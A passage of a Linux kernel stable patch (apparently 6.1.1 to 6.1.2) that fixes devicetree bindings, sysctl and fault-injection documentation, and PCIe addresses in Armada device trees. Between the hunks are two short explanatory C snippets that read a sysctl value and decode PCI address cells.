++		the "Read JEDEC ID" command (9Fh). This is the case for
++		non-JEDEC compliant flashes.
+ 
+ What:		/sys/bus/spi/devices/.../spi-nor/manufacturer
+ Date:		April 2021
+diff --git a/Documentation/admin-guide/sysctl/kernel.rst b/Documentation/admin-guide/sysctl/kernel.rst
+index 98d1b198b2b4c..c2c64c1b706ff 100644
+--- a/Documentation/admin-guide/sysctl/kernel.rst
++++ b/Documentation/admin-guide/sysctl/kernel.rst
+@@ -1314,6 +1314,29 @@ watchdog work to be queued by the watchdog timer function, otherwise the NMI
+ watchdog — if enabled — can detect a hard lockup condition.
+ 
+ 
++split_lock_mitigate (x86 only)
++==============================
++
++On x86, each "split lock" imposes a system-wide performance penalty. On larger
++systems, large numbers of split locks from unprivileged users can result in
++denials of service to well-behaved and potentially more important users.
++
++The kernel mitigates these bad users by detecting split locks and imposing
++penalties: forcing them to wait and only allowing one core to execute split
++locks at a time.
++
++These mitigations can make those bad applications unbearably slow. Setting
++split_lock_mitigate=0 may restore some application performance, but will also
++increase system exposure to denial of service attacks from split lock users.
++
++= ===================================================================
++0 Disable the mitigation mode - just warns the split lock on kernel log
++  and exposes the system to denials of service from the split lockers.
++1 Enable the mitigation mode (this is the default) - penalizes the split
++  lockers with intentional performance degradation.
++= ===================================================================
++
++
+ stack_erasing
+ =============
+ 
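
Given the sysctl documented above, a minimal reader for the current mode (assumes the standard procfs mapping of kernel.split_lock_mitigate; x86 only, the file is absent elsewhere):

    #include <stdio.h>

    int main(void)
    {
        FILE *f = fopen("/proc/sys/kernel/split_lock_mitigate", "r");
        int mode;

        if (!f || fscanf(f, "%d", &mode) != 1) {
            perror("split_lock_mitigate");
            return 1;
        }
        printf("split_lock_mitigate = %d\n", mode);
        fclose(f);
        return 0;
    }
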
+diff --git a/Documentation/devicetree/bindings/input/azoteq,iqs7222.yaml b/Documentation/devicetree/bindings/input/azoteq,iqs7222.yaml
+index 02e605fac408d..9ddba7f2e7aa6 100644
+--- a/Documentation/devicetree/bindings/input/azoteq,iqs7222.yaml
++++ b/Documentation/devicetree/bindings/input/azoteq,iqs7222.yaml
+@@ -473,9 +473,6 @@ patternProperties:
+               Specifies whether the event is to be interpreted as a key (1)
+               or a switch (5).
+ 
+-        required:
+-          - linux,code
+-
+         additionalProperties: false
+ 
+     dependencies:
+@@ -501,7 +498,7 @@ patternProperties:
+ 
+       azoteq,slider-size:
+         $ref: /schemas/types.yaml#/definitions/uint32
+-        minimum: 0
++        minimum: 1
+         maximum: 65535
+         description:
+           Specifies the slider's one-dimensional resolution, equal to the
+@@ -575,9 +572,9 @@ patternProperties:
+           linux,code: true
+ 
+           azoteq,gesture-max-ms:
+-            multipleOf: 4
++            multipleOf: 16
+             minimum: 0
+-            maximum: 1020
++            maximum: 4080
+             description:
+               Specifies the length of time (in ms) within which a tap, swipe
+               or flick gesture must be completed in order to be acknowledged
+@@ -585,9 +582,9 @@ patternProperties:
+               gesture applies to all remaining swipe or flick gestures.
+ 
+           azoteq,gesture-min-ms:
+-            multipleOf: 4
++            multipleOf: 16
+             minimum: 0
+-            maximum: 124
++            maximum: 496
+             description:
+               Specifies the length of time (in ms) for which a tap gesture must
+               be held in order to be acknowledged by the device.
+@@ -620,9 +617,6 @@ patternProperties:
+               GPIO, they must all be of the same type (proximity, touch or
+               slider gesture).
+ 
+-        required:
+-          - linux,code
+-
+         additionalProperties: false
+ 
+     required:
+@@ -693,6 +687,7 @@ allOf:
+           properties:
+             azoteq,slider-size:
+               multipleOf: 16
++              minimum: 16
+               maximum: 4080
+ 
+             azoteq,top-speed:
+@@ -935,14 +930,14 @@ examples:
+ 
+                             event-tap {
+                                     linux,code = <KEY_PLAYPAUSE>;
+-                                    azoteq,gesture-max-ms = <600>;
+-                                    azoteq,gesture-min-ms = <24>;
++                                    azoteq,gesture-max-ms = <400>;
++                                    azoteq,gesture-min-ms = <32>;
+                             };
+ 
+                             event-flick-pos {
+                                     linux,code = <KEY_NEXTSONG>;
+-                                    azoteq,gesture-max-ms = <600>;
+-                                    azoteq,gesture-dist = <816>;
++                                    azoteq,gesture-max-ms = <800>;
++                                    azoteq,gesture-dist = <800>;
+                             };
+ 
+                             event-flick-neg {
+diff --git a/Documentation/devicetree/bindings/mfd/qcom,spmi-pmic.yaml b/Documentation/devicetree/bindings/mfd/qcom,spmi-pmic.yaml
+index 6a3e3ede1ede7..777f2da52f1ed 100644
+--- a/Documentation/devicetree/bindings/mfd/qcom,spmi-pmic.yaml
++++ b/Documentation/devicetree/bindings/mfd/qcom,spmi-pmic.yaml
+@@ -98,6 +98,10 @@ properties:
+     type: object
+     $ref: /schemas/regulator/qcom,spmi-regulator.yaml#
+ 
++  pwm:
++    type: object
++    $ref: /schemas/leds/leds-qcom-lpg.yaml#
++
+ patternProperties:
+   "^adc@[0-9a-f]+$":
+     type: object
+@@ -123,10 +127,6 @@ patternProperties:
+     type: object
+     $ref: /schemas/power/reset/qcom,pon.yaml#
+ 
+-  "pwm@[0-9a-f]+$":
+-    type: object
+-    $ref: /schemas/leds/leds-qcom-lpg.yaml#
+-
+   "^rtc@[0-9a-f]+$":
+     type: object
+     $ref: /schemas/rtc/qcom-pm8xxx-rtc.yaml#
+diff --git a/Documentation/devicetree/bindings/pci/fsl,imx6q-pcie.yaml b/Documentation/devicetree/bindings/pci/fsl,imx6q-pcie.yaml
+index 376e739bcad40..49b4f7a32e71e 100644
+--- a/Documentation/devicetree/bindings/pci/fsl,imx6q-pcie.yaml
++++ b/Documentation/devicetree/bindings/pci/fsl,imx6q-pcie.yaml
+@@ -14,9 +14,6 @@ description: |+
+   This PCIe host controller is based on the Synopsys DesignWare PCIe IP
+   and thus inherits all the common properties defined in snps,dw-pcie.yaml.
+ 
+-allOf:
+-  - $ref: /schemas/pci/snps,dw-pcie.yaml#
+-
+ properties:
+   compatible:
+     enum:
+@@ -61,7 +58,7 @@ properties:
+       - const: pcie
+       - const: pcie_bus
+       - const: pcie_phy
+-      - const: pcie_inbound_axi for imx6sx-pcie, pcie_aux for imx8mq-pcie
++      - enum: [ pcie_inbound_axi, pcie_aux ]
+ 
+   num-lanes:
+     const: 1
+@@ -175,6 +172,47 @@ required:
+   - clocks
+   - clock-names
+ 
++allOf:
++  - $ref: /schemas/pci/snps,dw-pcie.yaml#
++  - if:
++      properties:
++        compatible:
++          contains:
++            const: fsl,imx6sx-pcie
++    then:
++      properties:
++        clock-names:
++          items:
++            - {}
++            - {}
++            - {}
++            - const: pcie_inbound_axi
++  - if:
++      properties:
++        compatible:
++          contains:
++            const: fsl,imx8mq-pcie
++    then:
++      properties:
++        clock-names:
++          items:
++            - {}
++            - {}
++            - {}
++            - const: pcie_aux
++  - if:
++      properties:
++        compatible:
++          not:
++            contains:
++              enum:
++                - fsl,imx6sx-pcie
++                - fsl,imx8mq-pcie
++    then:
++      properties:
++        clock-names:
++          maxItems: 3
++
+ unevaluatedProperties: false
+ 
+ examples:
+diff --git a/Documentation/devicetree/bindings/pci/toshiba,visconti-pcie.yaml b/Documentation/devicetree/bindings/pci/toshiba,visconti-pcie.yaml
+index 48ed227fc5b9e..53da2edd7c9ab 100644
+--- a/Documentation/devicetree/bindings/pci/toshiba,visconti-pcie.yaml
++++ b/Documentation/devicetree/bindings/pci/toshiba,visconti-pcie.yaml
+@@ -36,7 +36,7 @@ properties:
+       - const: mpu
+ 
+   interrupts:
+-    maxItems: 1
++    maxItems: 2
+ 
+   clocks:
+     items:
+@@ -94,8 +94,9 @@ examples:
+             #interrupt-cells = <1>;
+             ranges = <0x81000000 0 0x40000000 0 0x40000000 0 0x00010000>,
+                      <0x82000000 0 0x50000000 0 0x50000000 0 0x20000000>;
+-            interrupts = <GIC_SPI 215 IRQ_TYPE_LEVEL_HIGH>;
+-            interrupt-names = "intr";
++            interrupts = <GIC_SPI 211 IRQ_TYPE_LEVEL_HIGH>,
++                         <GIC_SPI 215 IRQ_TYPE_LEVEL_HIGH>;
++            interrupt-names = "msi", "intr";
+             interrupt-map-mask = <0 0 0 7>;
+             interrupt-map =
+                 <0 0 0 1 &gic GIC_SPI 215 IRQ_TYPE_LEVEL_HIGH
+diff --git a/Documentation/devicetree/bindings/pinctrl/mediatek,mt7986-pinctrl.yaml b/Documentation/devicetree/bindings/pinctrl/mediatek,mt7986-pinctrl.yaml
+index 89b8f3dd67a19..3342847dcb19a 100644
+--- a/Documentation/devicetree/bindings/pinctrl/mediatek,mt7986-pinctrl.yaml
++++ b/Documentation/devicetree/bindings/pinctrl/mediatek,mt7986-pinctrl.yaml
+@@ -87,6 +87,8 @@ patternProperties:
+           "wifi_led"        "led"       1, 2
+           "i2c"             "i2c"       3, 4
+           "uart1_0"         "uart"      7, 8, 9, 10
++          "uart1_rx_tx"     "uart"      42, 43
++          "uart1_cts_rts"   "uart"      44, 45
+           "pcie_clk"        "pcie"      9
+           "pcie_wake"       "pcie"      10
+           "spi1_0"          "spi"       11, 12, 13, 14
+@@ -98,9 +100,11 @@ patternProperties:
+           "emmc_45"         "emmc"      22, 23, 24, 25, 26, 27, 28, 29, 30,
+                                         31, 32
+           "spi1_1"          "spi"       23, 24, 25, 26
+-          "uart1_2"         "uart"      29, 30, 31, 32
++          "uart1_2_rx_tx"   "uart"      29, 30
++          "uart1_2_cts_rts" "uart"      31, 32
+           "uart1_1"         "uart"      23, 24, 25, 26
+-          "uart2_0"         "uart"      29, 30, 31, 32
++          "uart2_0_rx_tx"   "uart"      29, 30
++          "uart2_0_cts_rts" "uart"      31, 32
+           "spi0"            "spi"       33, 34, 35, 36
+           "spi0_wp_hold"    "spi"       37, 38
+           "uart1_3_rx_tx"   "uart"      35, 36
+@@ -157,7 +161,7 @@ patternProperties:
+             then:
+               properties:
+                 groups:
+-                  enum: [emmc, emmc_rst]
++                  enum: [emmc_45, emmc_51]
+           - if:
+               properties:
+                 function:
+@@ -221,8 +225,12 @@ patternProperties:
+             then:
+               properties:
+                 groups:
+-                  enum: [uart1_0, uart1_1, uart1_2, uart1_3_rx_tx,
+-                         uart1_3_cts_rts, uart2_0, uart2_1, uart0, uart1, uart2]
++                  items:
++                    enum: [uart1_0, uart1_rx_tx, uart1_cts_rts, uart1_1,
++                           uart1_2_rx_tx, uart1_2_cts_rts, uart1_3_rx_tx,
++                           uart1_3_cts_rts, uart2_0_rx_tx, uart2_0_cts_rts,
++                           uart2_1, uart0, uart1, uart2]
++                  maxItems: 2
+           - if:
+               properties:
+                 function:
+@@ -356,6 +364,27 @@ examples:
+         interrupt-parent = <&gic>;
+         #interrupt-cells = <2>;
+ 
++        pcie_pins: pcie-pins {
++          mux {
++            function = "pcie";
++            groups = "pcie_clk", "pcie_wake", "pcie_pereset";
++          };
++        };
++
++        pwm_pins: pwm-pins {
++          mux {
++            function = "pwm";
++            groups = "pwm0", "pwm1_0";
++          };
++        };
++
++        spi0_pins: spi0-pins {
++          mux {
++            function = "spi";
++            groups = "spi0", "spi0_wp_hold";
++          };
++        };
++
+         uart1_pins: uart1-pins {
+           mux {
+             function = "uart";
+@@ -363,6 +392,13 @@ examples:
+           };
+         };
+ 
++        uart1_3_pins: uart1-3-pins {
++          mux {
++            function = "uart";
++            groups = "uart1_3_rx_tx", "uart1_3_cts_rts";
++          };
++        };
++
+         uart2_pins: uart2-pins {
+           mux {
+             function = "uart";
+diff --git a/Documentation/devicetree/bindings/pwm/microchip,corepwm.yaml b/Documentation/devicetree/bindings/pwm/microchip,corepwm.yaml
+index a7fae1772a81b..cd8e9a8907f84 100644
+--- a/Documentation/devicetree/bindings/pwm/microchip,corepwm.yaml
++++ b/Documentation/devicetree/bindings/pwm/microchip,corepwm.yaml
+@@ -30,7 +30,9 @@ properties:
+     maxItems: 1
+ 
+   "#pwm-cells":
+-    const: 2
++    enum: [2, 3]
++    description:
++      The only flag supported by the controller is PWM_POLARITY_INVERTED.
+ 
+   microchip,sync-update-mask:
+     description: |
+diff --git a/Documentation/devicetree/bindings/sound/qcom,wcd9335.txt b/Documentation/devicetree/bindings/sound/qcom,wcd9335.txt
+index 5d6ea66a863fe..1f75feec3dec6 100644
+--- a/Documentation/devicetree/bindings/sound/qcom,wcd9335.txt
++++ b/Documentation/devicetree/bindings/sound/qcom,wcd9335.txt
+@@ -109,7 +109,7 @@ audio-codec@1{
+ 	reg  = <1 0>;
+ 	interrupts = <&msmgpio 54 IRQ_TYPE_LEVEL_HIGH>;
+ 	interrupt-names = "intr2"
+-	reset-gpios = <&msmgpio 64 0>;
++	reset-gpios = <&msmgpio 64 GPIO_ACTIVE_LOW>;
+ 	slim-ifc-dev  = <&wc9335_ifd>;
+ 	clock-names = "mclk", "native";
+ 	clocks = <&rpmcc RPM_SMD_DIV_CLK1>,
+diff --git a/Documentation/devicetree/bindings/sound/rt5682.txt b/Documentation/devicetree/bindings/sound/rt5682.txt
+index c5f2b8febceec..6b87db68337c2 100644
+--- a/Documentation/devicetree/bindings/sound/rt5682.txt
++++ b/Documentation/devicetree/bindings/sound/rt5682.txt
+@@ -46,7 +46,7 @@ Optional properties:
+ 
+ - realtek,dmic-clk-driving-high : Set the high driving of the DMIC clock out.
+ 
+-- #sound-dai-cells: Should be set to '<0>'.
++- #sound-dai-cells: Should be set to '<1>'.
+ 
+ Pins on the device (for linking into audio routes) for RT5682:
+ 
+diff --git a/Documentation/driver-api/spi.rst b/Documentation/driver-api/spi.rst
+index f64cb666498aa..f28887045049d 100644
+--- a/Documentation/driver-api/spi.rst
++++ b/Documentation/driver-api/spi.rst
+@@ -25,8 +25,8 @@ hardware, which may be as simple as a set of GPIO pins or as complex as
+ a pair of FIFOs connected to dual DMA engines on the other side of the
+ SPI shift register (maximizing throughput). Such drivers bridge between
+ whatever bus they sit on (often the platform bus) and SPI, and expose
+-the SPI side of their device as a :c:type:`struct spi_master
+-<spi_master>`. SPI devices are children of that master,
++the SPI side of their device as a :c:type:`struct spi_controller
++<spi_controller>`. SPI devices are children of that master,
+ represented as a :c:type:`struct spi_device <spi_device>` and
+ manufactured from :c:type:`struct spi_board_info
+ <spi_board_info>` descriptors which are usually provided by
+diff --git a/Documentation/fault-injection/fault-injection.rst b/Documentation/fault-injection/fault-injection.rst
+index 17779a2772e51..5f6454b9dbd4d 100644
+--- a/Documentation/fault-injection/fault-injection.rst
++++ b/Documentation/fault-injection/fault-injection.rst
+@@ -83,9 +83,7 @@ configuration of fault-injection capabilities.
+ - /sys/kernel/debug/fail*/times:
+ 
+ 	specifies how many times failures may happen at most. A value of -1
+-	means "no limit". Note, though, that this file only accepts unsigned
+-	values. So, if you want to specify -1, you better use 'printf' instead
+-	of 'echo', e.g.: $ printf %#x -1 > times
++	means "no limit".
+ 
+ - /sys/kernel/debug/fail*/space:
+ 
+@@ -284,7 +282,7 @@ Application Examples
+     echo Y > /sys/kernel/debug/$FAILTYPE/task-filter
+     echo 10 > /sys/kernel/debug/$FAILTYPE/probability
+     echo 100 > /sys/kernel/debug/$FAILTYPE/interval
+-    printf %#x -1 > /sys/kernel/debug/$FAILTYPE/times
++    echo -1 > /sys/kernel/debug/$FAILTYPE/times
+     echo 0 > /sys/kernel/debug/$FAILTYPE/space
+     echo 2 > /sys/kernel/debug/$FAILTYPE/verbose
+     echo Y > /sys/kernel/debug/$FAILTYPE/ignore-gfp-wait
+@@ -338,7 +336,7 @@ Application Examples
+     echo N > /sys/kernel/debug/$FAILTYPE/task-filter
+     echo 10 > /sys/kernel/debug/$FAILTYPE/probability
+     echo 100 > /sys/kernel/debug/$FAILTYPE/interval
+-    printf %#x -1 > /sys/kernel/debug/$FAILTYPE/times
++    echo -1 > /sys/kernel/debug/$FAILTYPE/times
+     echo 0 > /sys/kernel/debug/$FAILTYPE/space
+     echo 2 > /sys/kernel/debug/$FAILTYPE/verbose
+     echo Y > /sys/kernel/debug/$FAILTYPE/ignore-gfp-wait
+@@ -369,7 +367,7 @@ Application Examples
+     echo N > /sys/kernel/debug/$FAILTYPE/task-filter
+     echo 100 > /sys/kernel/debug/$FAILTYPE/probability
+     echo 0 > /sys/kernel/debug/$FAILTYPE/interval
+-    printf %#x -1 > /sys/kernel/debug/$FAILTYPE/times
++    echo -1 > /sys/kernel/debug/$FAILTYPE/times
+     echo 0 > /sys/kernel/debug/$FAILTYPE/space
+     echo 1 > /sys/kernel/debug/$FAILTYPE/verbose
+ 
+diff --git a/Makefile b/Makefile
+index 7307ae6c2ef72..2ecc568c779fa 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 1
++SUBLEVEL = 2
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/Kconfig b/arch/Kconfig
+index 8f138e580d1ae..81599f5c17b0f 100644
+--- a/arch/Kconfig
++++ b/arch/Kconfig
+@@ -635,7 +635,7 @@ config ARCH_SUPPORTS_SHADOW_CALL_STACK
+ config SHADOW_CALL_STACK
+ 	bool "Shadow Call Stack"
+ 	depends on ARCH_SUPPORTS_SHADOW_CALL_STACK
+-	depends on DYNAMIC_FTRACE_WITH_REGS || !FUNCTION_GRAPH_TRACER
++	depends on DYNAMIC_FTRACE_WITH_ARGS || DYNAMIC_FTRACE_WITH_REGS || !FUNCTION_GRAPH_TRACER
+ 	help
+ 	  This option enables the compiler's Shadow Call Stack, which
+ 	  uses a shadow stack to protect function return addresses from
+diff --git a/arch/alpha/include/asm/thread_info.h b/arch/alpha/include/asm/thread_info.h
+index fdc485d7787a6..084c27cb0c707 100644
+--- a/arch/alpha/include/asm/thread_info.h
++++ b/arch/alpha/include/asm/thread_info.h
+@@ -75,7 +75,7 @@ register struct thread_info *__current_thread_info __asm__("$8");
+ 
+ /* Work to do on interrupt/exception return.  */
+ #define _TIF_WORK_MASK		(_TIF_SIGPENDING | _TIF_NEED_RESCHED | \
+-				 _TIF_NOTIFY_RESUME)
++				 _TIF_NOTIFY_RESUME | _TIF_NOTIFY_SIGNAL)
+ 
+ /* Work to do on any return to userspace.  */
+ #define _TIF_ALLWORK_MASK	(_TIF_WORK_MASK		\
+diff --git a/arch/alpha/kernel/entry.S b/arch/alpha/kernel/entry.S
+index e227f3a29a43c..c41a5a9c3b9f2 100644
+--- a/arch/alpha/kernel/entry.S
++++ b/arch/alpha/kernel/entry.S
+@@ -469,8 +469,10 @@ entSys:
+ #ifdef CONFIG_AUDITSYSCALL
+ 	lda     $6, _TIF_SYSCALL_TRACE | _TIF_SYSCALL_AUDIT
+ 	and     $3, $6, $3
+-#endif
+ 	bne     $3, strace
++#else
++	blbs    $3, strace		/* check for SYSCALL_TRACE in disguise */
++#endif
+ 	beq	$4, 1f
+ 	ldq	$27, 0($5)
+ 1:	jsr	$26, ($27), sys_ni_syscall
+diff --git a/arch/arm/boot/dts/armada-370.dtsi b/arch/arm/boot/dts/armada-370.dtsi
+index 9dc928859ad33..2013a5ccecd31 100644
+--- a/arch/arm/boot/dts/armada-370.dtsi
++++ b/arch/arm/boot/dts/armada-370.dtsi
+@@ -84,7 +84,7 @@
+ 
+ 			pcie2: pcie@2,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82002800 0 0x80000 0 0x2000>;
++				assigned-addresses = <0x82001000 0 0x80000 0 0x2000>;
+ 				reg = <0x1000 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
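
What the armada-370 hunk above, and the similar Armada/Dove hunks that follow, are correcting (per the standard OF PCI bus binding; the decoder is illustrative): the first assigned-addresses cell encodes bus, device and function, and the old values disagreed with each node's reg devfn. Decoding the armada-370 case:

    #include <stdio.h>

    /* phys.hi layout: npt000ss bbbbbbbb dddddfff rrrrrrrr */
    static void decode(unsigned int hi)
    {
        printf("0x%08x -> bus %u dev %u fn %u\n", hi,
               (hi >> 16) & 0xff, (hi >> 11) & 0x1f, (hi >> 8) & 0x7);
    }

    int main(void)
    {
        decode(0x82002800);     /* old value: device 5 */
        decode(0x82001000);     /* new value: device 2, matching reg = <0x1000 ...> */
        return 0;
    }
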
+diff --git a/arch/arm/boot/dts/armada-375.dtsi b/arch/arm/boot/dts/armada-375.dtsi
+index 929deaf312a55..c310ef26d1cce 100644
+--- a/arch/arm/boot/dts/armada-375.dtsi
++++ b/arch/arm/boot/dts/armada-375.dtsi
+@@ -592,7 +592,7 @@
+ 
+ 			pcie1: pcie@2,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x44000 0 0x2000>;
++				assigned-addresses = <0x82001000 0 0x44000 0 0x2000>;
+ 				reg = <0x1000 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+diff --git a/arch/arm/boot/dts/armada-380.dtsi b/arch/arm/boot/dts/armada-380.dtsi
+index ce1dddb2269b0..e94f22b0e9b5e 100644
+--- a/arch/arm/boot/dts/armada-380.dtsi
++++ b/arch/arm/boot/dts/armada-380.dtsi
+@@ -89,7 +89,7 @@
+ 			/* x1 port */
+ 			pcie@2,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x40000 0 0x2000>;
++				assigned-addresses = <0x82001000 0 0x40000 0 0x2000>;
+ 				reg = <0x1000 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -118,7 +118,7 @@
+ 			/* x1 port */
+ 			pcie@3,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x44000 0 0x2000>;
++				assigned-addresses = <0x82001800 0 0x44000 0 0x2000>;
+ 				reg = <0x1800 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+diff --git a/arch/arm/boot/dts/armada-385-turris-omnia.dts b/arch/arm/boot/dts/armada-385-turris-omnia.dts
+index 72ac807cae259..0c1f238e4c306 100644
+--- a/arch/arm/boot/dts/armada-385-turris-omnia.dts
++++ b/arch/arm/boot/dts/armada-385-turris-omnia.dts
+@@ -23,6 +23,12 @@
+ 		stdout-path = &uart0;
+ 	};
+ 
++	aliases {
++		ethernet0 = &eth0;
++		ethernet1 = &eth1;
++		ethernet2 = &eth2;
++	};
++
+ 	memory {
+ 		device_type = "memory";
+ 		reg = <0x00000000 0x40000000>; /* 1024 MB */
+@@ -483,7 +489,17 @@
+ 				};
+ 			};
+ 
+-			/* port 6 is connected to eth0 */
++			ports@6 {
++				reg = <6>;
++				label = "cpu";
++				ethernet = <&eth0>;
++				phy-mode = "rgmii-id";
++
++				fixed-link {
++					speed = <1000>;
++					full-duplex;
++				};
++			};
+ 		};
+ 	};
+ };
+diff --git a/arch/arm/boot/dts/armada-385.dtsi b/arch/arm/boot/dts/armada-385.dtsi
+index 83392b92dae28..be8d607c59b21 100644
+--- a/arch/arm/boot/dts/armada-385.dtsi
++++ b/arch/arm/boot/dts/armada-385.dtsi
+@@ -93,7 +93,7 @@
+ 			/* x1 port */
+ 			pcie2: pcie@2,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x40000 0 0x2000>;
++				assigned-addresses = <0x82001000 0 0x40000 0 0x2000>;
+ 				reg = <0x1000 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -121,7 +121,7 @@
+ 			/* x1 port */
+ 			pcie3: pcie@3,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x44000 0 0x2000>;
++				assigned-addresses = <0x82001800 0 0x44000 0 0x2000>;
+ 				reg = <0x1800 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -152,7 +152,7 @@
+ 			 */
+ 			pcie4: pcie@4,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x48000 0 0x2000>;
++				assigned-addresses = <0x82002000 0 0x48000 0 0x2000>;
+ 				reg = <0x2000 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+diff --git a/arch/arm/boot/dts/armada-39x.dtsi b/arch/arm/boot/dts/armada-39x.dtsi
+index 923b035a3ab38..9d1cac49c022f 100644
+--- a/arch/arm/boot/dts/armada-39x.dtsi
++++ b/arch/arm/boot/dts/armada-39x.dtsi
+@@ -463,7 +463,7 @@
+ 			/* x1 port */
+ 			pcie@2,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x40000 0 0x2000>;
++				assigned-addresses = <0x82001000 0 0x40000 0 0x2000>;
+ 				reg = <0x1000 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -492,7 +492,7 @@
+ 			/* x1 port */
+ 			pcie@3,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x44000 0 0x2000>;
++				assigned-addresses = <0x82001800 0 0x44000 0 0x2000>;
+ 				reg = <0x1800 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -524,7 +524,7 @@
+ 			 */
+ 			pcie@4,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x48000 0 0x2000>;
++				assigned-addresses = <0x82002000 0 0x48000 0 0x2000>;
+ 				reg = <0x2000 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+diff --git a/arch/arm/boot/dts/armada-xp-mv78230.dtsi b/arch/arm/boot/dts/armada-xp-mv78230.dtsi
+index bf9360f41e0a6..5ea9d509cd308 100644
+--- a/arch/arm/boot/dts/armada-xp-mv78230.dtsi
++++ b/arch/arm/boot/dts/armada-xp-mv78230.dtsi
+@@ -107,7 +107,7 @@
+ 
+ 			pcie2: pcie@2,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x44000 0 0x2000>;
++				assigned-addresses = <0x82001000 0 0x44000 0 0x2000>;
+ 				reg = <0x1000 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -135,7 +135,7 @@
+ 
+ 			pcie3: pcie@3,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x48000 0 0x2000>;
++				assigned-addresses = <0x82001800 0 0x48000 0 0x2000>;
+ 				reg = <0x1800 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -163,7 +163,7 @@
+ 
+ 			pcie4: pcie@4,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x4c000 0 0x2000>;
++				assigned-addresses = <0x82002000 0 0x4c000 0 0x2000>;
+ 				reg = <0x2000 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -191,7 +191,7 @@
+ 
+ 			pcie5: pcie@5,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x80000 0 0x2000>;
++				assigned-addresses = <0x82002800 0 0x80000 0 0x2000>;
+ 				reg = <0x2800 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+diff --git a/arch/arm/boot/dts/armada-xp-mv78260.dtsi b/arch/arm/boot/dts/armada-xp-mv78260.dtsi
+index 0714af52e6075..6c6fbb9faf5ac 100644
+--- a/arch/arm/boot/dts/armada-xp-mv78260.dtsi
++++ b/arch/arm/boot/dts/armada-xp-mv78260.dtsi
+@@ -122,7 +122,7 @@
+ 
+ 			pcie2: pcie@2,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x44000 0 0x2000>;
++				assigned-addresses = <0x82001000 0 0x44000 0 0x2000>;
+ 				reg = <0x1000 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -150,7 +150,7 @@
+ 
+ 			pcie3: pcie@3,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x48000 0 0x2000>;
++				assigned-addresses = <0x82001800 0 0x48000 0 0x2000>;
+ 				reg = <0x1800 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -178,7 +178,7 @@
+ 
+ 			pcie4: pcie@4,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x4c000 0 0x2000>;
++				assigned-addresses = <0x82002000 0 0x4c000 0 0x2000>;
+ 				reg = <0x2000 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -206,7 +206,7 @@
+ 
+ 			pcie5: pcie@5,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x80000 0 0x2000>;
++				assigned-addresses = <0x82002800 0 0x80000 0 0x2000>;
+ 				reg = <0x2800 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -234,7 +234,7 @@
+ 
+ 			pcie6: pcie@6,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x84000 0 0x2000>;
++				assigned-addresses = <0x82003000 0 0x84000 0 0x2000>;
+ 				reg = <0x3000 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -262,7 +262,7 @@
+ 
+ 			pcie7: pcie@7,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x88000 0 0x2000>;
++				assigned-addresses = <0x82003800 0 0x88000 0 0x2000>;
+ 				reg = <0x3800 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -290,7 +290,7 @@
+ 
+ 			pcie8: pcie@8,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x8c000 0 0x2000>;
++				assigned-addresses = <0x82004000 0 0x8c000 0 0x2000>;
+ 				reg = <0x4000 0 0 0 0>;
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+@@ -318,7 +318,7 @@
+ 
+ 			pcie9: pcie@9,0 {
+ 				device_type = "pci";
+-				assigned-addresses = <0x82000800 0 0x42000 0 0x2000>;
